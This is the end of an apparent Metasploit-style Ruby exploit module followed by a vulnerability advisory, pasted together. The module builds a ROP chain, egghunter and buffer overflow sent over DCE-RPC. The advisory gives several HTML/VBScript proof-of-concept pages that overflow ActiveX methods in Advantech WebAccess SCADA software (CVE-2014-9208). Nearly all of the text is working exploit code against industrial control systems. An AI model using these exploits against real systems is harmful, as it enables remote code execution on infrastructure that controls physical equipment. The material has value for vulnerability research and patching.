      0x0203a134,  # ptr to &VirtualAlloc() [IAT BwKrlAPI.dll]
      0x02032fb4,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [BwKrlAPI.dll]
      0x070738ee,  # XCHG EAX,ESI # RETN [BwPAlarm.dll]
      0x0201a646,  # POP EBP # RETN [BwKrlAPI.dll]
      0x07024822,  # & push esp # ret  [BwPAlarm.dll]
      0x070442dd,  # POP EAX # RETN [BwPAlarm.dll]
      0xffffffff,  # Value to negate, will become 0x00000001
      0x070467d2,  # NEG EAX # RETN [BwPAlarm.dll]
      0x0704de61,  # PUSH EAX # ADD ESP,0C # POP EBX # RETN [BwPAlarm.dll]
      rand_text_alpha(4).unpack('V'),
      rand_text_alpha(4).unpack('V'),
      rand_text_alpha(4).unpack('V'),
      0x02030af7,  # POP EAX # RETN [BwKrlAPI.dll]
      0xfbdbcbd5,  # put delta into eax (-> put 0x00001000 into edx)
      0x02029003,  # ADD EAX,424442B # RETN [BwKrlAPI.dll]
      0x0201234a,  # XCHG EAX,EDX # RETN [BwKrlAPI.dll]
      0x07078df5,  # POP EAX # RETN [BwPAlarm.dll]
      0xffffffc0,  # Value to negate, will become 0x00000040
      0x070467d2,  # NEG EAX # RETN [BwPAlarm.dll]
      0x07011e60,  # PUSH EAX # ADD AL,5B # POP ECX # RETN 0x08 [BwPAlarm.dll]
      0x0706fe66,  # POP EDI # RETN [BwPAlarm.dll]
      rand_text_alpha(4).unpack('V'),
      rand_text_alpha(4).unpack('V'),
      0x0703d825,  # RETN (ROP NOP) [BwPAlarm.dll]
      0x0202ca65,  # POP EAX # RETN [BwKrlAPI.dll]
      0x90909090,  # nop
      0x07048f5a,  # PUSHAD # RETN [BwPAlarm.dll]
    ].flatten.pack("V*")
    return rop_gadgets
  end

  def exploit
    connect
    handle = dcerpc_handle('5d2b62aa-ee0a-4a95-91ae-b064fdb471fc', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
    print_status("Binding to #{handle} ...")
    dcerpc_bind(handle)
    print_status("Bound to #{handle} ...")

    # send the request to get the handle
    resp   = dcerpc.call(0x4, [0x02000000].pack('V'))
    handle = resp.last(4).unpack('V').first
    print_good("Got a handle: 0x%08x" % handle)
    egg_options = { :eggtag   => "0day" }
    egghunter, egg = generate_egghunter(payload.encoded, payload_badchars, egg_options)

    # apparently this is called a ret chain
    overflow  = [target['Slide']].pack('V')
    overflow << [target['Slide']].pack('V')
    overflow << [target['Slide']].pack('V')
    overflow << [target['Slide']].pack('V')
    overflow << [target['Slide']].pack('V')
    overflow << [target['Slide']].pack('V')
    overflow << [target['Jmp']].pack('V')
    overflow << [target['Ret']].pack('V')
    overflow << [target['Slide']].pack('V')
    overflow << [target['Slide']].pack('V')
    overflow << [target['Slide']].pack('V')
    overflow << [target['Slide']].pack('V')
    overflow << [target['Slide']].pack('V')
    overflow << [target['Slide']].pack('V')
    overflow << create_rop_chain()
    overflow << egghunter
    overflow << egg
    overflow << rand_text_alpha(0x1000-overflow.length)

    # sorry but I dont like msf's ndr class.
    sploit  = [handle].pack('V')
    sploit << [0x000138bd].pack('V')  # opcode we are attacking
    sploit << [0x00001000].pack('V')  # size to copy
    sploit << [0x00001000].pack('V')  # size of string
    sploit << overflow
    print_status("Trying target #{target.name}...")
    begin
        dcerpc_call(0x1, sploit)
        rescue Rex::Proto::DCERPC::Exceptions::NoResponse
    ensure
        disconnect
    end
    handler
  end
end
HireHackking 
Introduction
*********************************************************************************
Using Advantech WebAccess SCADA Software we can remotely manage Industrial
Control systems devices like RTU's, Generators, Motors etc. Attackers can
execute code remotely by passing maliciously crafted string to
ConvToSafeArray API in ASPVCOBJLib.AspDataDriven ActiveX.

Operating System: Windows SP1
Affected Product: Advantech WebAccess 8.0, 3.4.3
Vulnerable Program: AspVCObj.dll
CVE-2014-9208

*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
UpdateProject Overflow Remote Code Execution"
*********************************************************************************

<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:3703BA5D-7329-4E60-A1A5-AE7D6DF267C1' id='target' />
<script language='vbscript'>

<!--
targetFile = "C:\WebAccess\Node\webdobj.dll"
prototype  = "Sub UpdateProject ( ByVal WwwPort As String ,  ByVal ProjName
As String ,  ByVal ProjIP As String ,  ByVal ProjPort As Long ,  ByVal
ProjTimeout As Long ,  ByVal ProjDir As String )"
-->

arg1="defaultV"
arg2="defaultV"
arg3=String(1044, "A")
arg4=1
arg5=1
arg6="defaultV"

target.UpdateProject arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6

</script></html>
</html>


*********************************************************************************

Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
InterfaceFilter Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype  = "Function InterfaceFilter ( ByVal Interface As String ) As
String"
-->

arg1=String(1044, "A")

target.InterfaceFilter arg1

</script></html>


*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
FileProcess Overflow Remote Code Execution"
*********************************************************************************

<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype  = "Sub FileProcess ( ByVal Type As Integer ,  ByVal FileName As
String )"
-->

arg1=1
arg2=String(1044, "A")

target.FileProcess arg1 ,arg2

</script></html>


*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
GetWideStrCpy Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype  = "Function GetWideStrCpy ( ByVal Type As Integer ,  ByVal inStr
As String ) As String"
-->

arg1=1
arg2=String(1044, "A")

target.GetWideStrCpy arg1 ,arg2

</script></html>

*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
GetRecipeInfo Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype  = "Function GetRecipeInfo ( ByVal Type As Integer ,  ByVal
filePath As String )"
-->

arg1=1
arg2=String(1044, "A")

target.GetRecipeInfo arg1 ,arg2

</script></html>

*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
GetLastTagNbr Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype  = "Function GetLastTagNbr ( ByVal TagName As String ) As String"
-->

arg1=String(1044, "A")

target.GetLastTagNbr arg1

</script></html>

*********************************************************************************

Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
ConvToSafeArray Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype  = "Function ConvToSafeArray ( ByVal ArrSize As Integer ,  ByVal
inStr As String )"
-->

arg1=1
arg2=String(2068, "A")

target.ConvToSafeArray arg1 ,arg2

</script></html>
*********************************************************************************
Vulnerabilities were reported to Advantech sometime in January/February
2015, coordinated through CSOC.From April 2015 they has been postponing the
fix.